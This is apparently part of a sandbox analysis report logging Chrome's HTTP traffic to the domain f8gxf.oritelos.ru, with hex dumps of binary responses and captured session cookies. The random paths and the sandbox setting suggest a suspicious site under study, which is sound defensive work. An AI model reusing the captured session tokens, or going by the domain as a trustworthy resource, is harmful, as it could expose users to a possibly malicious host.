                                                2024-05-30 10:21:12 UTC1369INData Raw: c3 25 0b 9d f2 4a e9 03 fe a9 a9 bb 81 48 18 fa 58 6c d7 68 8e c9 73 ff 93 f3 ea 71 72 7c d4 67 35 e2 25 58 ad 9b 53 bb 0e 1a 84 1a b8 82 5e 74 f8 f1 ff 58 67 54 9d 62 90 e9 68 f1 c4 58 64 f4 a7 11 7b 4a 5a 49 91 3e 4e c4 a0 f3 c2 16 05 ca 58 f5 2f 67 94 92 df bd d2 cb da 8d 4e 2f c9 b6 83 3e 5b 35 3d f8 fc e3 65 9c 37 d6 d2 a2 c6 49 f6 ae d8 e1 89 37 ae 63 7d 3f 6f 70 d7 3f 3b 22 5b 75 e5 01 5e 3b bd 02 7a e2 ad bd 31 24 3b ab 34 eb 3d 4b b2 d1 8a eb d4 09 e1 09 bc 2e 7f c6 88 31 51 e6 fa 1c 6a c5 06 7d 66 4a f0 e0 eb c6 48 eb a6 3e de c9 7a 7d 78 4b d7 98 bd e2 c3 08 cd f3 88 6d ff fa 2e f6 41 89 df d6 d2 4a ff 7b f6 01 aa 12 65 af e8 2b 9c 2a 6b b9 21 bb 8c e8 e3 a7 1f ef 6f bf d7 f8 0b 47 b0 c3 71 a6 2e 6c 7f 81 ee 98 c2 d1 a6 7a dd 76 dd d1 70 c9 bf
                                                Data Ascii: %JHXlhsqr|g5%XS^tXgTbhXd{JZI>NX/gN/>[5=e7I7c}?op?;"[u^;z1$;4=K.1Qj}fJH>z}xKm.AJ{e+*k!oGq.lzvp
                                                2024-05-30 10:21:12 UTC1369INData Raw: 17 36 9d d7 1b 32 2a 11 0d 58 a9 2e 71 1b 1f 61 c5 f5 94 ef d3 73 ea 88 7e fb b9 e6 e1 b6 70 c5 34 0a fa 3b 86 fc cc ba 3c 05 7c 34 ea 88 f5 a3 a2 c0 20 35 13 6c 15 e6 41 b8 3e b6 11 22 ac 69 58 6e 3e 6f 9f 28 7b a8 5f 8d bd 76 d8 eb 29 93 79 48 c9 a3 99 6f 6d 06 7f 5d 9e f1 6c 7c 55 3b 55 c9 af 3f cf 18 45 2c 1f 72 44 e3 8e 81 85 63 86 d5 6b ad b7 62 ee 7b 30 a5 df b6 73 24 1a c7 c1 b3 0d fe d9 73 ef 8f c3 b0 9d 51 f5 d7 70 ba 54 f4 24 dd 1a 73 5e 9d 9c 39 5d 1e 8c 82 fe 2c 1f ac a6 0c ba fc c5 27 14 94 19 0f 5f 43 a0 42 02 67 1f be 85 af e9 f8 fc a5 c4 0d b4 f6 ff a2 a2 95 1c ec dd 96 1c e3 1d 16 52 27 61 e2 78 29 ad 1d 7e c2 7e d3 02 91 a1 b6 1e d4 a0 32 62 5d 05 eb 60 2f a3 ce 28 2a e3 76 d1 e6 94 8a 9e 84 ca d4 81 95 59 f2 d3 14 a9 29 ba 67 d3 7a 42
                                                Data Ascii: 62*X.qas~p4;<|4 5lA>"iXn>o({_v)yHom]l|U;U?E,rDckb{0s$sQpT$s^9],'_CBgR'ax)~~2b]`/(*vY)gzB
                                                2024-05-30 10:21:12 UTC1369INData Raw: 28 d4 a6 32 9a 40 88 66 46 b8 5f 12 ff ff f1 87 04 f0 10 a2 2a 99 3a 19 38 85 1e 76 b6 ca 97 a4 50 a1 74 c5 4a 64 28 d7 28 4b 8b 76 a5 ba f4 a8 34 64 58 ad 57 5e a9 37 61 5a 83 05 0b b0 56 ec 6a b1 ef 8d 6e 47 be ea 77 69 c1 73 7e 5b 36 e1 26 c8 81 08 6c e7 58 14 76 72 2e 2a 52 87 d1 0a 77 14 a7 68 9f bb 2f d5 97 1e 6b e9 a2 36 6d fd ae 5d 6f 7f 1a b0 82 9f bb 29 b7 d4 fd 91 ac f6 10 55 d6 d9 81 2f c0 08 b1 30 af 61 14 e9 1d cc 52 bc 9b 4d aa f7 6a 94 66 cc 30 31 cf 58 e7 eb 7d 07 9e e7 07 f4 ff dd 72 11 79 f7 17 5f 34 4c 30 6f 52 00 13 2c 5d 6a a1 96 01 ec 65 65 8c c9 a0 60 fb 80 e3 33 a2 57 29 00 94 cf 1c 2c af 0c ea d6 9e 38 04 86 2f cf 6a 38 67 ad fd e2 eb f5 49 f1 24 1f c0 fb 3c e2 91 ad 41 0a dd d8 dc da de ed 78 67 77 6f ff 60 6d 3b 3c b2 37 0b d6
                                                Data Ascii: (2@fF_*:8vPtJd((Kv4dXW^7aZVjnGwis~[6&lXvr.*Rwh/k6m]o)U/0aRMjf01X}ry_4L0oR,]jee`3W),8/j8gI$<Axgwo`m;<7
                                                2024-05-30 10:21:12 UTC1369INData Raw: 47 91 d7 a4 a8 59 49 85 cd e8 3b 74 ea d2 ad 47 af 01 83 2a 50 d0 30 b0 86 e7 e1 2b 22 33 b7 92 8a 9a 86 56 b1 9b 6b ab d7 c0 f1 42 d4 c9 4c 7c 57 eb 35 6a d6 a2 4d 87 17 ba 74 eb d5 6f f0 25 a9 7f fd e7 cc 5b b0 68 c9 b2 15 ab d6 ac db b4 65 db 8e 5d 7b f6 1f 5c 46 ee 05 c1 f8 3a a8 e2 f4 ae 1d 96 85 be 31 95 e5 ba 29 b3 5a 43 66 ac 5d ff 03 0f b1 75 01 fc b2 4f 81 3a f6 64 4f 47 bb 09 e2 3c 29 42 ad e2 3e 22 4d c4 96 88 6b 74 7e fd 64 e0 75 81 12 2b 3a af dd 10 60 9b 79 6f a0 89 16 44 eb 3a 5f 22 ef c0 43 4c be cd 4a 39 0e c7 e5 59 da 0b 4e c2 cb e5 0c c1 50 23 94 b7 f3 4e de 25 4a c6 14 ad b2 60 08 6e 56 39 dc aa d3 6a 2d 0f 41 b9 5a df dc ee da de da be da fe 15 9d 13 bc 46 63 60 98 0d 8b 15 9c 87 cd 92 34 67 eb 36 27 78 65 b2 4c 56 6b 35 cf d3 9b ce
                                                Data Ascii: GYI;tG*P0+"3VkBL|W5jMto%[he]{\F:1)ZCf]uO:dOG<)B>"Mkt~du+:`yoD:_"CLJ9YNP#N%J`nV9j-AZFc`4g6'xeLVk5
                                                2024-05-30 10:21:12 UTC1369INData Raw: 54 95 c8 98 28 93 32 63 a4 7d 4c 7f a8 5d 3c fc e6 0b 52 65 a8 96 ad 58 0e 9c 5d eb b6 6c 47 61 61 c3 76 2e 25 66 40 87 ee 2b 77 72 0b b9 36 71 8f ab 5f 1d 5b f5 cc bb 91 f0 45 30 3e 81 94 2f a3 d2 8e 56 37 3a 3d a8 75 61 30 8d d1 0c 4e 07 58 6c 60 b7 83 db 11 56 9b 78 3d f6 4d 93 ef f2 ae 35 07 29 06 c0 76 69 21 92 12 8b a1 27 35 49 2b 44 12 93 cf 48 71 b0 40 ca 43 53 1d 9e ca b0 90 23 52 1b 9b e6 94 b4 a7 a7 35 4d 21 2e 87 4c c3 aa 9a 97 c9 d2 f4 17 66 95 1f bf 28 5e 61 c2 ca 24 35 89 ab 13 55 a5 5c 9f 62 5d f2 f6 6c 6f 17 b8 23 ef de 82 df 2a 60 7b 41 6f 16 f1 7e 31 ad 15 2b a1 9d 92 db 2f b1 dd 08 f8 24 f1 58 b6 cd cf a7 2f 72 be 06 8f cf 43 45 27 ad 4d b5 a1 b3 3a 34 5b ca 51 91 0f 59 c2 86 19 45 7e 58 f8 7b 3d fb a0 a4 f6 ba ef b4 4e 2f bc d4 55 5c
                                                Data Ascii: T(2c}L]<ReX]lGaav.%f@+wr6q_[E0>/V7:=ua0NXl`Vx=M5)vi!'5I+DHq@CS#R5M!.Lf(^a$5U\b]lo#*`{Ao~1+/$X/rCE'M:4[QYE~X{=N/U\


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                39192.168.2.449788188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:11 UTC1389OUTGET /efoHxPf1tkQQJ2bQoGNe78ItFgVg4zXAkl97 HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                Origin: https://f8gxf.oritelos.ru
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: font
                                                Referer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVG
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:12 UTC629INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:12 GMT
                                                Content-Type: font/woff2
                                                Content-Length: 93276
                                                Connection: close
                                                Content-Disposition: inline; filename="efoHxPf1tkQQJ2bQoGNe78ItFgVg4zXAkl97"
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SmJJRpnFb1PJq%2FM9IcU4us3EhPEZIUezHMkfKF0abva0njWdhx6JYxpm3e9SJEWzrqWjns2I6jy7s13x1StrqA5H9SEmkWOdNbkFnXRA28AClhkurhUfOH%2BQwOOc2Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdfef3391b8cd7-EWR
                                                2024-05-30 10:21:12 UTC1369INData Raw: 77 4f 46 32 00 01 00 00 00 01 6c 5c 00 14 00 00 00 04 b2 20 00 01 6b e0 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a a4 76 1b 83 bb 26 1c 93 24 3f 48 56 41 52 a0 6a 3f 4d 56 41 52 81 46 06 60 3f 53 54 41 54 81 36 27 38 00 91 18 2f 81 48 11 08 0a 81 f8 0c 81 d3 78 0b 89 1a 00 30 8b e7 3a 01 36 02 24 03 92 30 04 20 05 97 7a 07 a2 17 5b 12 9a 94 07 25 22 db df 13 ba a5 ab c1 a5 a2 a8 fe 21 df bb 49 da 54 19 b0 7f a9 77 90 21 63 9b 48 1d ce cd 74 1d 5d 6b a5 08 9e a7 0f c8 36 9d f1 82 43 79 c3 a8 7f 55 6c b7 72 65 ff ff ff ff ff ff 9b 92 49 8c e9 25 e8 25 f9 7f 00 15 44 45 b1 a0 ba ce 76 d3 69 ae 51 46 38 dc dd 84 83 d2 69 48 19 21 72 0a ca e2 f4 da d1 50 34 5a 5b b9 db ae 1d f6 5a 73 10 9e 89 b6 6f 06 0e 72 ef e2 38 62 1c 4f e8
                                                Data Ascii: wOF2l\ kv&$?HVARj?MVARF`?STAT6'8/Hx0:6$0 z[%"!ITw!cHt]k6CyUlreI%%DEviQF8iH!rP4Z[Zsor8bO
                                                2024-05-30 10:21:12 UTC1369INData Raw: 7d 7b ae 4c c2 30 6b 04 5b 27 d9 2a bc 08 b8 9a 7b de bb 64 0f 73 94 bc 20 3c 82 02 ba b2 6c 15 09 49 be ec 88 55 a7 c6 b0 fe b2 12 14 00 e8 ca 76 c2 f3 cf 4f fd de 75 74 25 db b2 3d a5 17 fe 7f 12 a5 74 80 c2 1e e0 01 44 7b 94 da 60 2d 80 7d 9c d6 59 60 a5 8d 85 8d 61 1b 6b 54 1e c2 a9 76 92 41 36 cb b6 24 cb 02 b2 c4 26 8e 31 88 4d 4a b0 ad 3c 7a de 9e 9a 66 1d c2 13 e2 e0 a1 63 ec c6 05 0c 5e 8e a1 55 86 46 94 f1 87 49 48 3a 9f 18 5d f3 5b 7b f7 17 94 48 32 89 b1 15 16 61 ff f3 05 14 ba bc aa be 6c 51 d5 02 b9 bb 02 ed cc cf 69 df 14 fb d5 61 71 58 e2 17 d3 7f 26 eb 6f d7 ca f8 1f 0a 2a 39 05 0f 51 13 a8 6a 95 66 57 57 f5 ce 3d 80 89 09 a1 c5 40 df 48 36 81 26 dc dc 00 be 84 1a 10 87 78 f8 77 ed 73 5e 32 f0 61 76 b7 80 28 01 65 7b 7c 25 2b 16 3a f9 b3
                                                Data Ascii: }{L0k['*{ds <lIUvOut%=tD{`-}Y`akTvA6$&1MJ<zfc^UFIH:][{H2alQiaqX&o*9QjfWW=@H6&xws^2av(e{|%+:
                                                2024-05-30 10:21:12 UTC1369INData Raw: ef 99 e1 2f 76 b3 9a 45 44 44 8c 88 88 b8 ea aa aa aa ba fa de fb c7 9a 56 30 b0 bd 99 a6 80 a5 02 22 0c d8 62 ee f1 3a a8 78 de cd 99 3d 4a d2 f7 89 88 e6 6b 47 73 c4 d4 e5 9e ae c1 b5 2a 2a 1d 64 ff 33 6a 63 40 f8 00 a1 04 f8 91 45 89 db 07 59 ae 9e 17 3c ae 8e 64 c7 b6 d6 f4 e2 48 49 0a 2c 22 32 94 ad 4c c5 8a 57 8d 29 22 ff f3 f0 fa ea 6b ce bd dd 06 bb 49 d9 7a 19 f3 af 0e 91 08 86 aa 2c 97 59 cb 8d 5f cb f9 b3 a9 28 e1 56 15 20 01 22 55 b9 7f 39 b2 ef 0b 20 68 6e 42 06 11 d3 51 e1 7e f9 5b 8c 12 0d 37 3d 28 4d 4c 37 ea 03 f8 83 6c c9 ea 56 47 1d 91 d6 a9 d3 52 5d da ac 76 db 97 a4 35 a9 4d 6e b5 2e 28 ac c0 80 33 ab 00 bf e8 a9 d3 90 e6 05 8a fa 5a 4f 65 65 dd 26 71 26 aa 9e 8a 69 21 f1 26 a3 0b 8e ba 51 d4 2b 0a c0 ac 4e 83 df fb a1 5c de df c7 84
                                                Data Ascii: /vEDDV0"b:x=JkGs**d3jc@EY<dHI,"2LW)"kIz,Y_(V "U9 hnBQ~[7=(ML7lVGR]v5Mn.(3ZOee&q&i!&Q+N\
                                                2024-05-30 10:21:12 UTC1369INData Raw: 95 c6 c3 3d ad 69 1b 22 6d a7 fa 4d 25 92 4c bf 81 85 a6 a6 a0 e0 56 3e 31 b3 29 d9 50 72 b9 cd c4 92 70 70 ac 15 12 d2 d7 17 11 19 88 5a ad 5b 49 b3 20 58 93 14 65 66 57 75 bb bb 9a 2e df 7c bd 14 e3 78 2c b6 5f fa 18 18 e6 a0 fc 39 41 d1 43 ca 70 02 41 24 0b 21 c5 36 ef f3 27 d4 14 56 7a 4a da 6b 90 e4 11 fd 4f dc 92 a9 ab ef 1b 4f e2 a1 c2 04 21 8a 4f d4 de 27 0f 1f c2 ef 37 11 0c 3e 55 1f 41 db 7a 72 aa 23 e5 e5 27 f0 17 4d 9f 3e 59 1b 2b 02 5f be 9c f5 d7 c5 bb 8b 1f cf 2f d4 43 f3 0f 77 ae 03 2d bd 39 d6 c0 5f b8 45 bb bc 7b b4 7c 47 d4 b3 bb c5 b6 9f 1e 2c b1 79 3e a2 36 66 45 6d 28 e6 dc 0c 8d 8b 6b 71 a8 9b 77 7a 33 d9 37 4e 87 54 8f a3 7f 40 63 04 55 47 4a 1a b8 76 82 18 e2 be 7f 98 5c 6f cf 48 b0 3e 7a 74 20 6e 6a 3a c7 a8 26 89 dd 9c ce 4a 89
                                                Data Ascii: =i"mM%LV>1)PrppZ[I XefWu.|x,_9ACpA$!6'VzJkOO!O'7>UAzr#'M>Y+_/Cw-9_E{|G,y>6fEm(kqwz37NT@cUGJv\oH>zt nj:&J
                                                2024-05-30 10:21:12 UTC1369INData Raw: fe 7e d7 da b5 5d 89 c4 6a 93 f2 1d ce 3a cc a6 5d 6b 78 db b4 86 4a 9c 82 43 0c 77 df ba be 67 87 dd 77 7d ec 1f 6f 68 c8 cc fc b6 79 f3 1c bf 41 b2 a7 e7 fe fd 8c 8d b4 62 d1 a2 d8 d8 bb 42 54 55 31 4c 0a 13 62 36 4b 45 6d 31 0a dd b4 60 81 bf 3f 5e 55 e8 f7 a3 54 b7 6e a5 0d 0a c3 f1 e5 aa 41 1e 4a 8a f6 5b 17 97 4d 9b f0 ad a2 e3 fe 94 6b f3 35 b4 33 c7 f3 66 6b 96 36 96 38 19 83 72 72 71 eb f9 86 1f 49 44 4f cf fd 8f e4 99 64 f9 1d b0 a6 91 46 72 54 57 3b d4 83 ce d9 0e b3 50 21 d2 9f 25 0f 77 6b 79 95 39 67 6d 5a a9 fa a1 4d 0b 1d 81 3e 89 71 ef f8 9e 69 9f 22 ab d7 fc c4 77 3c 43 ed cd 08 ed ef a6 7b f5 a5 11 d5 df 27 49 0d 46 28 05 81 61 25 a2 5d a6 81 69 5c c2 02 08 27 52 07 15 bd 8f 9d f8 5b 07 70 bf e6 cd 17 08 28 e0 26 fd 17 dd 73 03 02 74 77
                                                Data Ascii: ~]j:]kxJCwgw}ohyAbBTU1Lb6KEm1`?^UTnAJ[Mk53fk68rrqIDOdFrTW;P!%wky9gmZM>qi"w<C{'IF(a%]i\'R[p(&stw
                                                2024-05-30 10:21:12 UTC1369INData Raw: 57 ec 56 8d 35 4f c5 4a e1 de a3 06 52 3c b1 56 92 e1 ae ac 22 dd 53 c6 90 aa e4 fc 62 4b 8b 25 d0 74 1b 08 f0 b7 25 2e e2 31 e3 6a ae 65 c4 81 e2 bb 10 0a 1d 0f f2 c1 d2 6a f7 59 9a 86 7b 30 12 3a bf 23 dd 56 ee 00 6b a3 78 b0 41 dc a9 1b b1 77 61 0a a4 bd 88 3a 30 13 6b 77 52 32 57 7a ec 91 2e ef d7 44 43 30 61 4f bc 44 44 3a f6 69 59 ba 84 9a f8 26 d5 ea 2c 47 cc f5 ec c4 26 d8 cc af a0 9e 03 07 86 f6 94 60 a9 ca 11 7e 41 67 d4 eb 42 d6 0c 73 0e c7 b4 3b b2 65 3f 8d c7 72 1e d1 d3 e6 a5 6d 9f 33 80 16 a6 c0 5b 09 a0 74 5c 06 f9 0f 6b 6f 58 05 30 a7 1a 32 19 c4 1f 70 3d 91 35 3d d4 ce 4c 74 60 f2 e6 2d 6c b4 45 da 30 62 bf 2b eb e8 28 0f a3 1a ca 78 d7 62 9b 53 26 cb f2 94 82 52 db 64 9b 90 ef f0 56 d4 b5 db 01 43 9d 8a b5 f0 fb a2 ac 59 d4 56 bf ab 5c
                                                Data Ascii: WV5OJR<V"SbK%t%.1jejY{0:#VkxAwa:0kwR2Wz.DC0aODD:iY&,G&`~AgBs;e?rm3[t\koX02p=5=Lt`-lE0b+(xbS&RdVCYV\
                                                2024-05-30 10:21:12 UTC1369INData Raw: af 0c 84 f7 49 d8 2a 28 2c 31 b1 0e 2f ab 78 f1 30 ea 73 26 36 f3 c6 0d 7f 72 40 01 32 4b ca 02 ae 56 46 ba 18 d9 b8 1c 8d 92 53 59 65 7e e7 61 14 0b 2b 03 33 49 57 01 38 3e a0 38 b1 a9 16 6d 50 82 b6 59 24 47 8d e6 d6 0d 29 c2 71 17 5c 50 aa 50 92 d3 be b2 19 f0 68 97 d1 08 7e 85 09 3f eb 80 7b d2 1e fd 46 a5 0d ce c0 59 03 b6 ea 1c dc eb 42 71 73 e5 eb 13 2c cc 61 16 51 cd 26 2d 53 ba 72 68 ca 23 5a 3b 81 03 57 7a cb 9a e8 22 83 37 85 02 3c 92 86 e6 b5 3e eb c7 6a a3 4c 21 91 0a a2 78 ab 3c 7b d6 5a b0 5a 43 b3 1d ea 90 28 4b 6c 12 e4 5c d5 a4 e8 d0 a9 5a ab c1 5b 44 23 da d0 df 6a 4f 01 54 a9 4f 78 58 89 b1 c4 0c e1 5d b5 49 e5 51 2a 48 9b c0 e8 a6 25 b9 05 ab 5e b1 cc e9 b5 05 00 be 89 33 a2 88 a1 ef ad f7 2b 65 ce 62 9b 09 89 62 ce cc 8e 62 9b 7e 09
                                                Data Ascii: I*(,1/x0s&6r@2KVFSYe~a+3IW8>8mPY$G)q\PPh~?{FYBqs,aQ&-Srh#Z;Wz"7<>jL!x<{ZZC(Kl\Z[D#jOTOxX]IQ*H%^3+ebbb~
                                                2024-05-30 10:21:12 UTC1369INData Raw: 16 58 e0 4d bc 20 b1 50 90 fe 13 e5 1d 85 ef ed 88 ac db 1e ed a9 2f de 5f 69 df 16 f5 42 e6 f7 ac 0c 33 b5 e0 8c e9 7d 93 c1 78 d8 48 34 ee 36 bc 57 cc ea 09 03 c4 b8 9b 01 e3 89 fe 37 3d 4d f7 4a 57 79 4c f2 5a d4 f7 14 07 e5 9c 0c 37 5c f6 47 e3 9f 7b 90 fd 61 18 61 b6 c3 65 8f 80 f8 aa 01 e2 62 13 2e fc 3a db 98 74 8c 1e c6 c3 9b ec 28 de 4c ff ac 5b d9 dd 12 92 e1 f3 13 a9 8d 0e 6d c3 b7 04 17 a1 05 3a 20 f6 20 04 76 13 92 f3 c5 26 3d 04 76 2a 68 aa 44 b3 70 6c 14 f8 6e 96 73 ec 96 a0 47 b6 2c 66 12 fe 24 df 9d 13 c8 fe 90 6d 7a dd b5 94 26 d9 50 d6 7f 7c 12 34 3a e1 0c 7e 14 37 8e ad 46 7d 88 c2 aa 02 0a 87 0c 64 f0 d2 7f f9 b8 52 ec 49 ef c7 c8 c3 55 e1 e2 f0 84 40 41 40 b6 af ca eb a4 97 dc c3 e0 d6 e6 96 5d 84 c8 bd 51 7b da f6 50 1e bc bd c3 7a
                                                Data Ascii: XM P/_iB3}xH46W7=MJWyLZ7\G{aaeb.:t(L[m: v&=v*hDplnsG,f$mz&P|4:~7F}dRIU@A@]Q{Pz
                                                2024-05-30 10:21:12 UTC1369INData Raw: 7d 85 f5 14 84 aa 46 22 7b 66 75 e4 96 7f 61 c0 6f 87 12 5a ea 09 db bf 53 f8 52 98 e8 93 b8 86 fd 3e 35 4c a6 cf 00 38 3b 41 44 92 23 04 e4 3e 03 f9 e0 03 09 6b c0 7e c7 9b 9b c7 7f e4 8f 03 3e 3d a0 f2 cc 04 db 77 dd 2a 98 d0 50 22 3c 51 8d 80 0c 32 03 57 79 ac 86 6d 99 f0 b5 98 a7 4c 6c 1f fb ae e4 ce 9c cd 81 b1 b7 36 b0 12 a9 09 ba d3 7a a8 ff fc f4 2b 15 31 42 e7 e2 e1 15 b7 0d 28 77 1f a0 00 f0 30 08 8a e1 04 49 d1 0c cb f1 82 d8 6b 07 19 23 10 49 64 0a 95 46 67 30 59 6c 0e 97 07 85 41 50 ec 3f eb 55 92 90 4a a9 1e 39 b9 ec 76 d9 90 1d ed e6 9a 7a a6 cb 0b e6 fe 8d 79 f6 97 b7 b8 7e 8b cd 6d 37 f8 d0 a7 21 d2 48 8d b7 93 b8 a5 b7 0a cf 99 56 74 50 56 a9 ba 0b 6a a8 ad ea 36 e9 4e 2f 3b ff c3 13 40 b6 a3 83 05 3a 07 23 42 02 23 28 86 13 24 45 33 2c
                                                Data Ascii: }F"{fuaoZSR>5L8;AD#>k~>=w*P"<Q2WymLl6z+1B(w0Ik#IdFg0YlAP?UJ9vzy~m7!HVtPVj6N/;@:#B#($E3,
                                                2024-05-30 10:21:12 UTC740INData Raw: c3 de 09 75 f2 e3 50 6e 00 da f3 e5 11 4e 98 5e 76 e4 98 9b e5 4a 91 66 1f f9 a2 bb ea 9e fb 1e e8 e9 3f 55 cf bd 50 a3 1f a4 0f 47 01 20 d4 8a 73 0f 4a c6 31 29 de 94 ba 4a 73 99 28 43 39 fa aa c8 6b 64 a0 12 53 d5 aa c5 04 1b 75 38 79 7a 86 2c 0e 65 fb 5d b0 c6 43 87 5c ed fa 65 aa 83 4a fa b0 35 39 15 11 b5 8b 86 ca de 28 5a 97 3d 13 72 f6 61 e0 ec 35 fa d5 c9 6a 96 7b 82 7a 6d 40 07 6b 17 05 c0 89 a2 18 4e 90 14 cd b0 1c 2f 88 73 e7 05 55 d3 0d d3 b2 9f 29 5f 82 02 30 81 25 99 50 c6 85 a2 6a fb f4 07 a6 65 3b ef 6a 3e b8 cf 92 a5 0b 5d 86 72 15 eb 6a d7 a3 41 e3 a6 3e db da 1e f6 c7 70 fc 89 e4 49 4b 69 f3 60 d7 d9 87 59 82 55 77 34 55 fb 23 7c d4 17 11 dd 35 f7 dc f7 40 4f ff 91 e7 5e c5 e6 12 fa 70 0c 00 08 b5 e2 dc f7 c0 47 9d 48 92 92 93 8e 21 c5
                                                Data Ascii: uPnN^vJf?UPG sJ1)Js(C9kdSu8yz,e]C\eJ59(Z=ra5j{zm@kN/sU)_0%Pje;j>]rjA>pIKi`YUw4U#|5@O^pGH!


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                40192.168.2.449789188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:11 UTC1457OUTGET /klpWKk32gxuOs7NipwmTvBAiwrwHsZdCtNCzija15cfNIJA8Jl2SAW0BE2ZBBrAhRNr49wx220 HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVG
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:12 UTC677INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:12 GMT
                                                Content-Type: image/svg+xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Content-Disposition: inline; filename="klpWKk32gxuOs7NipwmTvBAiwrwHsZdCtNCzija15cfNIJA8Jl2SAW0BE2ZBBrAhRNr49wx220"
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MWB9aufT64hTA11uDZdFovMOAS3b%2FBWTJIxXuOhPl2hQz2HLlEze6DyZgNEz3xRF03NKTAMZgAeE2fqIHkhKpGz%2FRNvl3aWxoBcQSxzFY4ALfiAD2%2FE9vQ0ojGdNTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdfef348de5e6d-EWR
